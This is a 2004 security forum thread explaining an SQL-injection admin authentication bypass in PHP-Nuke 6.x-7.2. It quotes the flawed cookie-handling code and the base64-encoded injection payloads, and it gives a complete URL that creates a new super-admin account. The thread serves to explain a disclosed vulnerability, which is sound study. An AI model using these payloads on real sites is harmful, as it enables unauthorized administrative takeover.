|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 71
Members: 0
Total: 71
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Admin-level authentication bypass in phpnuke 6.x-7.2 |
|
Posted: Sun May 23, 2004 8:46 am |
|
|
$t3 |
Regular user |
|
|
Joined: May 19, 2004 |
Posts: 15 |
|
|
|
|
|
|
|
hum i have 1 problem...
i dont hunderstand how to get this code:
eCcgVU5JT04gU0VMRUNUIDEvKjox
the full string is
admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
** is in this tutorial **
Code: | http://www.waraxe.us/?modname=sa&id=018 |
Sorry for my bad english!
thanx man |
|
|
|
|
|
My Explanation |
|
Posted: Sun May 23, 2004 9:15 am |
|
|
icenix |
Advanced user |
|
|
Joined: May 13, 2004 |
Posts: 106 |
Location: Australia |
|
|
|
|
|
|
My field is basically Security in all but PHP Isnt really my thing (but im learning)
Basically
its because of
Code: |
$admintest = 0;
if(isset($admin) && $admin != "") {
$admin = base64_decode($admin);
$admin = explode(":", $admin);
$aid = "$admin[0]";
$pwd = "$admin[1]";
|
because $admin base64_decodes itself...
he "Constructs" a base64 message which is "x'%20OR/*:y"
which ends up to be "eCcgT1IvKjp5"
the second bit he goes onto explain is the filter that PHPNuke uses to filter out naughty commands from users who try and hack something
which is
Code: |
if (preg_match("/\?admin/", "$checkurl")) {
echo "die";
exit;
|
that truly sucks because as he said its very limited..
ie. All it blocks is:
Code: |
http://localhost.com/admin.php*
|
(note the wildcard which means everything after it.
so how he bypasses this is by adding something totaly useless.
therefore.
Code: |
http://localhost.com/admin.php?foo=bar&admin=eCcgT1IvKjp5
|
then the message
Code: |
"Selection from database failed!"
|
basically just proves his point that theres an SQL Injection here and he just didnt parse any commands...
Code: |
http://localhost.com/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1
|
is the code that admins use for adding a user and making him an admin...just all in 1 string...
Code: |
x'%20UNION%20SELECT%201/*:1
|
which after base64 encoding gives us "eCcgVU5JT04gU0VMRUNUIDEvKjox"
is just used for bypassing the auth..
it can be done because of a flaw in the script
specifically:
Code: |
$pwd = "$admin[1]";
|
where it pulls the cookie from the user. it has a [1] after it...
and by "comparing the two strings" it gives us an OK.
((Basically its saying...is there a 1 there? if so...authentication is ok))
so now that we have bypassed our admin login..
we can pretty much do whatever we want..
so instead of passing commands through a modified "online" cookie
why not just add us a user?
I really hope i helped and waraxe could explain this better
give me some feedback on how i went explaining this hehe
PHP Isnt really my thing yet
How did i go Janek??? if im totaly wrong i will just delete my post.. i dont want to confuse anyone im learning here too |
|
|
|
|
|
|
|
|
Posted: Sun May 23, 2004 1:39 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Yes, icenix, you are right with your answers.
By the way - i will make publicly available base64encoder/decoder
and md5 hasher, so anyone can play with those php functions
without actual need for php programming. Stay tuned! |
|
|
|
|
|
thanx :) |
|
Posted: Sun May 23, 2004 6:37 pm |
|
|
$t3 |
Regular user |
|
|
Joined: May 19, 2004 |
Posts: 15 |
|
|
|
|
|
|
|
base64encoder/decoder
and md5 hasher
COOL
thanx icenix
thanx waraxe
|
|
|
|
|
Posted: Tue May 25, 2004 10:30 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|